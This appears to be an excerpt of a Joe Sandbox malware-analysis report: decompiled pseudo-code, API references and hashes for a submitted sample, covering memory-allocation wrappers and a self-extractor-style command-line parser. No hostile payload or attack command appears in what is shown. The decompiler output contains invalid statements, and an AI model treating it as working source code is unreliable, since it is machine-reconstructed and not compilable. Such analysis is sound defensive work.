                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 557ef9e285cb37ead73c28aa78a0e48c499efb707a9bbc004691662073ee9dbf
                                                                                                                                                                                                      • Instruction ID: 954ddc27adb18becbf637338ec762f87f3a268141bab325baebcf956302da3d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557ef9e285cb37ead73c28aa78a0e48c499efb707a9bbc004691662073ee9dbf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B092BA226440426A254771BC295562961A7D123A7E51B90F032D01E0CA7EC856D404
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00a64caa
                                                                                                                                                                                                      0x00a64cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A64CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      • Opcode ID: 60967759ea18ae30c9f733df647a69c5c981e20b5f0a5518a8cd7540fb5f38b3
                                                                                                                                                                                                      • Instruction ID: 174157bafd49528552631832f7b24c2417c8b56d90000b099e1a0fa4df8a0446
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60967759ea18ae30c9f733df647a69c5c981e20b5f0a5518a8cd7540fb5f38b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEB0123204820CB7CF001FC2EC09F853F2DE7C4761F150000F60C454508AB294118A96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00a64cc8
                                                                                                                                                                                                      0x00a64ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      • Opcode ID: c8921c21467b18a9700da7273ea08c82e3e23a6e23710a94311e1de52c0f0756
                                                                                                                                                                                                      • Instruction ID: d2adcada1901603592da4c4fd9bd269ec8739c42c5bcf88561f3444de1d51b56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8921c21467b18a9700da7273ea08c82e3e23a6e23710a94311e1de52c0f0756
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44B0123100010CB78F001B82EC088453F2DD6C02607010010F50C414218B7398128985
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00A65C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E00A66CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E00A66E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E00A6597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0xa69124 = E00A66285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E00A66CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E00A644B9(0, 0x521, 0xa61140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0xa68588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                      															if(E00A6667F(_t215, _t205) == 0) {
                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                      																if(E00A6667F(_t215, _t206) == 0) {
                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                      																	if(E00A65C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                      																		E00A61680(0xa68c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                      																	if(E00A6667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                      																if(E00A6667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *0xa68a24 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                      															if(E00A65C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                      																_t218 = 0xa68b3e;
                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                      																	_t218 = 0xa68a3a;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																E00A61680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                      																E00A6658A(_t218, 0x104, 0xa61140);
                                                                                                                                                                                                      																if(E00A631E0(_t218) != 0) {
                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                      																			 *0xa68a2c = 1;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                      																				 *0xa68a30 = 1;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                      																					 *0xa68a34 = 1;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															 *0xa68a2c = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0xa68a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0xa69a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0xa69a2c =  *0xa69a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0xa68d48 =  *0xa68d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0xa69a2c =  *0xa69a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0xa69a2c =  *0xa69a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0xa68d48 =  *0xa68d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0xa69a2c =  *0xa69a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0xa68a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0xa69a2c = 3;
                                                                                                                                                                                                      																	 *0xa68a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0xa68a2c != 0 &&  *0xa68b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xa69a3c, 0xa68b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E00A666C8(0xa68b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}


































































                                                                                                                                                                                                      0x00a65c9e
                                                                                                                                                                                                      0x00a65ca9
                                                                                                                                                                                                      0x00a65cb0
                                                                                                                                                                                                      0x00a65cb3
                                                                                                                                                                                                      0x00a65cb6
                                                                                                                                                                                                      0x00a65cb7
                                                                                                                                                                                                      0x00a65cb8
                                                                                                                                                                                                      0x00a65cbd
                                                                                                                                                                                                      0x00a66204
                                                                                                                                                                                                      0x00a65ccb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65ccb
                                                                                                                                                                                                      0x00a65cd3
                                                                                                                                                                                                      0x00a65cd7
                                                                                                                                                                                                      0x00a65cf4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65cf4
                                                                                                                                                                                                      0x00a65cf8
                                                                                                                                                                                                      0x00a65d00
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d06
                                                                                                                                                                                                      0x00a65d06
                                                                                                                                                                                                      0x00a65d0e
                                                                                                                                                                                                      0x00a65d10
                                                                                                                                                                                                      0x00a65d12
                                                                                                                                                                                                      0x00a65d14
                                                                                                                                                                                                      0x00a65d15
                                                                                                                                                                                                      0x00a65d17
                                                                                                                                                                                                      0x00a65d49
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d19
                                                                                                                                                                                                      0x00a65d19
                                                                                                                                                                                                      0x00a65d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d3f
                                                                                                                                                                                                      0x00a65d3f
                                                                                                                                                                                                      0x00a65d4b
                                                                                                                                                                                                      0x00a65d4b
                                                                                                                                                                                                      0x00a65d4f
                                                                                                                                                                                                      0x00a65d8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d93
                                                                                                                                                                                                      0x00a65d93
                                                                                                                                                                                                      0x00a65d9a
                                                                                                                                                                                                      0x00a65d9d
                                                                                                                                                                                                      0x00a65d9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d9e
                                                                                                                                                                                                      0x00a65d51
                                                                                                                                                                                                      0x00a65d5b
                                                                                                                                                                                                      0x00a65d72
                                                                                                                                                                                                      0x00a660fb
                                                                                                                                                                                                      0x00a660fb
                                                                                                                                                                                                      0x00a66207
                                                                                                                                                                                                      0x00a6620a
                                                                                                                                                                                                      0x00a6620b
                                                                                                                                                                                                      0x00a6620e
                                                                                                                                                                                                      0x00a66217
                                                                                                                                                                                                      0x00a65d78
                                                                                                                                                                                                      0x00a65d78
                                                                                                                                                                                                      0x00a65d80
                                                                                                                                                                                                      0x00a65d83
